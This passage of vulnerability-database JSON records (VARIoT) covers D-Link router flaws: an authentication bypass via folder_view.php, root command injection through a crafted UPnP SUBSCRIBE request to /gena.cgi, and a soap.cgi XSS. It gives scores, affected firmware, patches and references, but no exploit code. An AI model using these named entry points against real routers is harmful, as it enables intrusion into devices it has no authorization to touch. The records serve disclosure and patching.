"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-16190",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-16190",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2019-16190",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2019-39556",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201909-349",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39556"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-349"
},
{
"db": "NVD",
"id": "CVE-2019-16190"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SharePort Web Access on D-Link DIR-868L REVB through 2.03, DIR-885L REVA through 1.20, and DIR-895L REVA through 1.21 devices allows Authentication Bypass, as demonstrated by a direct request to folder_view.php or category_view.php. D-Link DIR-868L REVB , DIR-885L REVA , DIR-895L REVA Devices have authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DIR-868L REVB and so on are all wireless routers from Taiwan D-Link. \n\nThere are security vulnerabilities in SharePort Web Access in D-Link DIR-868L REVB 2.03 and earlier, DIR-885L REVA 1.20 and earlier, and DIR-895L REVA 1.21 and earlier. An attacker could use this vulnerability to bypass authentication",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-16190"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
},
{
"db": "CNVD",
"id": "CNVD-2019-39556"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-16190",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009185",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-39556",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201909-349",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39556"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-349"
},
{
"db": "NVD",
"id": "CVE-2019-16190"
}
]
},
"id": "VAR-201909-0587",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39556"
}
],
"trust": 0.98515407
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39556"
}
]
},
"last_update_date": "2024-11-23T22:37:42.851000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.dlink.com/en/consumer"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
},
{
"db": "NVD",
"id": "CVE-2019-16190"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://cyberloginit.com/2019/09/10/dlink-shareport-web-access-authentication-bypass.html"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16190"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-16190"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39556"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-349"
},
{
"db": "NVD",
"id": "CVE-2019-16190"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-39556"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
},
{
"db": "CNNVD",
"id": "CNNVD-201909-349"
},
{
"db": "NVD",
"id": "CVE-2019-16190"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39556"
},
{
"date": "2019-09-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-009185"
},
{
"date": "2019-09-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201909-349"
},
{
"date": "2019-09-09T20:15:10.887000",
"db": "NVD",
"id": "CVE-2019-16190"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-39556"
},
{
"date": "2019-09-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-009185"
},
{
"date": "2021-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201909-349"
},
{
"date": "2024-11-21T04:30:14.413000",
"db": "NVD",
"id": "CVE-2019-16190"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201909-349"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Authentication vulnerabilities in product devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-009185"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201909-349"
}
],
"trust": 0.6
}
}
var-201912-1012
Vulnerability from variot
The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network. D-Link DIR-859 Wi-Fi The router has OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-859 is a wireless router from Taiwan D-Link Corporation.
A remote command execution vulnerability exists in DLINK's DIR-859 series routers. Attackers can use this vulnerability to execute arbitrary commands on target devices with root privileges
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201912-1012",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-818lx",
"scope": "eq",
"trust": 2.2,
"vendor": "dlink",
"version": null
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": "1.11b01"
},
{
"model": "dir-890r",
"scope": "eq",
"trust": 1.6,
"vendor": "dlink",
"version": "1.11b01"
},
{
"model": "dir-880l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b04"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.05b02"
},
{
"model": "dir-822",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "2.03b01"
},
{
"model": "dir-890r",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.11b01"
},
{
"model": "dir-823",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.00b06"
},
{
"model": "dir-869",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b02"
},
{
"model": "dir-885l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b05"
},
{
"model": "dir-890l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.11b01"
},
{
"model": "dir-895r",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b10"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b04"
},
{
"model": "dir-895l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b10"
},
{
"model": "dir-823",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.00b06"
},
{
"model": "dir-869",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b02"
},
{
"model": "dir-885r",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.12b05"
},
{
"model": "dir-859",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b01"
},
{
"model": "dir-859",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b03"
},
{
"model": "dir-822",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.12b04"
},
{
"model": "dir-865l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.07b01"
},
{
"model": "dir-822",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-823",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-859",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-865l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-868l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-869",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-880l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-885l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-890l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-890r",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-859 v1.06b01 beta01",
"scope": null,
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-890r",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-895r",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
},
{
"model": "dir-885r",
"scope": "eq",
"trust": 0.6,
"vendor": "dlink",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03900"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-1224"
},
{
"db": "NVD",
"id": "CVE-2019-17621"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-822_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-823_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-859_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-865l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-869_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-880l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-885l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-890l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-890r_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Miguel Mendez Z, Pablo Pollanco P",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-1224"
}
],
"trust": 0.6
},
"cve": "CVE-2019-17621",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2019-17621",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-03900",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-17621",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-17621",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-17621",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2019-17621",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-03900",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201912-1224",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2019-17621",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03900"
},
{
"db": "VULMON",
"id": "CVE-2019-17621"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-1224"
},
{
"db": "NVD",
"id": "CVE-2019-17621"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network. D-Link DIR-859 Wi-Fi The router has OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-859 is a wireless router from Taiwan D-Link Corporation. \n\r\n\r\nA remote command execution vulnerability exists in DLINK\u0027s DIR-859 series routers. Attackers can use this vulnerability to execute arbitrary commands on target devices with root privileges",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-17621"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"db": "CNVD",
"id": "CNVD-2020-03900"
},
{
"db": "VULMON",
"id": "CVE-2019-17621"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-17621",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "156054",
"trust": 1.6
},
{
"db": "DLINK",
"id": "SAP10146",
"trust": 1.6
},
{
"db": "DLINK",
"id": "SAP10147",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013893",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-03900",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201912-1224",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-17621",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03900"
},
{
"db": "VULMON",
"id": "CVE-2019-17621"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-1224"
},
{
"db": "NVD",
"id": "CVE-2019-17621"
}
]
},
"id": "VAR-201912-1012",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03900"
}
],
"trust": 1.2588377259999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03900"
}
]
},
"last_update_date": "2024-11-23T21:59:32.207000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP10146",
"trust": 0.8,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
},
{
"title": "SAP10147",
"trust": 0.8,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Command execution vulnerability in DLINKDIR-859 router v1.06B01 BETA01",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/195823"
},
{
"title": "D-Link DIR-859 Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=106703"
},
{
"title": "IoT-vulhub",
"trust": 0.1,
"url": "https://github.com/VulnTotal-Team/IoT-vulhub "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03900"
},
{
"db": "VULMON",
"id": "CVE-2019-17621"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-1224"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"db": "NVD",
"id": "CVE-2019-17621"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10146"
},
{
"trust": 1.6,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.6,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10147"
},
{
"trust": 1.6,
"url": "https://www.ftc.gov/system/files/documents/cases/dlink_proposed_order_and_judgment_7-2-19.pdf"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/156054/d-link-dir-859-unauthenticated-remote-command-execution.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17621"
},
{
"trust": 1.0,
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104"
},
{
"trust": 1.0,
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-es-fad716629ff9"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17621"
},
{
"trust": 0.6,
"url": "https://medium.com/@s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104"
},
{
"trust": 0.6,
"url": "https://medium.com/@s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-es-fad716629ff9"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-1224"
},
{
"db": "NVD",
"id": "CVE-2019-17621"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-03900"
},
{
"db": "VULMON",
"id": "CVE-2019-17621"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-1224"
},
{
"db": "NVD",
"id": "CVE-2019-17621"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03900"
},
{
"date": "2019-12-30T00:00:00",
"db": "VULMON",
"id": "CVE-2019-17621"
},
{
"date": "2020-01-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"date": "2019-12-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201912-1224"
},
{
"date": "2019-12-30T17:15:19.857000",
"db": "NVD",
"id": "CVE-2019-17621"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03900"
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2019-17621"
},
{
"date": "2020-01-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-013893"
},
{
"date": "2020-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201912-1224"
},
{
"date": "2024-11-21T04:32:38.893000",
"db": "NVD",
"id": "CVE-2019-17621"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-1224"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-859 Wi-Fi At the router OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013893"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-1224"
}
],
"trust": 0.6
}
}
var-201803-1768
Vulnerability from variot
XSS vulnerability in htdocs/webinc/js/bsc_sms_inbox.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted Treturn parameter to soap.cgi. D-Link DIR-868L , DIR-865L ,and DIR-860L Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-868L and others are all wireless router products of D-Link. A cross-site scripting vulnerability exists in the htdocs/webinc/js/bsc_sms_inbox.php file in D-LinkDIR-868L, DIR-865L, and DIR-860L. D-Link DIR-868L, etc. The following products and versions are affected: D-Link DIR-868L DIR868LA1_FW112b04 and earlier; DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and earlier; DIR-860L DIR860LA1_FW110b04 and earlier
Show details on source website{
"@context": {
